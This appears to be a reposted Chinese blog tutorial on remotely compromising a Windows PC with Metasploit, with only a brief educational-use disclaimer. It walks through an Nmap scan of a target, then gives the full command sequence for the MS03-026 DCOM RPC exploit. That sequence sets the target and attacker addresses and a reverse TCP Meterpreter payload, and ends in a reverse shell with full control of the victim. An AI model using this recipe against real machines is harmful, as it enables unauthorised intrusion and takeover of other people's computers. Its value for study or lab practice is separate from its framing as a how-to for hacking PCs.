Metasploit 是一种先进的黑客工具,拥有一整套先进的渗透测试工具。
渗透测试人员和黑客正在利用这个工具获得如此多的优势。
对于黑客而言,这是一个完整的黑客攻击包,他几乎可以使用它进行任何攻击。
我不是在讨论本文中的攻击,但我将分享如何使用 Metasploit 远程攻击 PC。
如果你注意的话,这并不复杂。它只需要更好地了解您正在执行的每个步骤。让我们继续讨论如何做到这一点。
注意:本教程仅供教育使用
在开始之前,请确保使用 metasploit 远程破解 PC 所需的所有内容。
- Linux 机器(Kali Linux 或 BackTrack 5)
- Metasploit(内置于上述 Linux 操作系统中)
- Windows PC 受害者
步骤
让我们继续讨论如何执行完整的攻击。
- 启动 Linux 操作系统并打开 Nmap 并为受害远程服务器运行扫描。就像我们在远程服务器 192.168.42.129 上有我们的受害者。它将显示受害者计算机的所有开放端口的范围,如下所示。
- 我们可以看到这里的开放端口是 135.所以,现在我们去 metasploit 并尝试利用它并获得访问权限。要打开,请导航到 应用程序 > BackTrack > 漏洞利用工具 > 网络漏洞利用工具 > Metasploit 框架 > msfconsole
- 在 msfconsole 初始化标准检查之后,我们将看到如下窗口。
- 现在,由于我们已经知道我们的端口 135 是开放的,因此我们在 Metasploit 中搜索相关的 RPC 漏洞。您可以使用命令’
show exploits
‘ 查看metasploit
支持的所有漏洞利用列表。
- 现在使用一个漏洞,例如:
use exploit/windows/dcerpc/ms03_026_dcom
- 当我们处于我们所需的漏洞利用环境中时,我们需要根据我们的场景配置漏洞利用。要查看漏洞利用的所有可用选项的列表,我们可以使用命令“
show options
”。我们已经知道开放端口 RPORT 是 135.因此,我们只需要设置我们可以使用“set RHOST
”命令设置的 RHOST。只需输入“set RHOST 192.168.42.129
”即可。
- 现在,在我们启动漏洞之前,就是为漏洞利用设置有效负载。我们可以使用“
show payloads
”命令查看所有可用的有效负载。
- 每个有效负载都可用于不同的场景。在我们的例子中,我们使用的是反向 tcp meterpreter,可以使用命令“
set PAYLOAD windows/meterpreter/reverse_tcp
”为远程 shell 设置,然后使用“show options
” 命令查看它的选项。
- 这里我们注意到 LHOST 没有设置有效载荷,所以我们使用命令“
set LHOST 192.168.42.128
” 将它设置为我们的公共 IP,即 192.168.42.128 - 现在,exploit 已配置好并准备启动。现在只需使用“
exploit
”命令来发动攻击。如果 exploit 成功执行,我们将看到如下消息。
- 现在已经在受害者和我们的机器之间建立了反向连接,我们可以完全控制服务器
我们已经成功访问了具有 metasploit 的远程 PC。这就是如何使用 metasploit 远程破解 PC。希望它对你有用。
版权属于:Xcnte' s Blog(除特别注明外)
本文链接:https://cloud.tencent.com/developer/article/1918292
本站文章采用 知识共享署名4.0 国际许可协议 进行许可,请在转载时注明出处及本声明!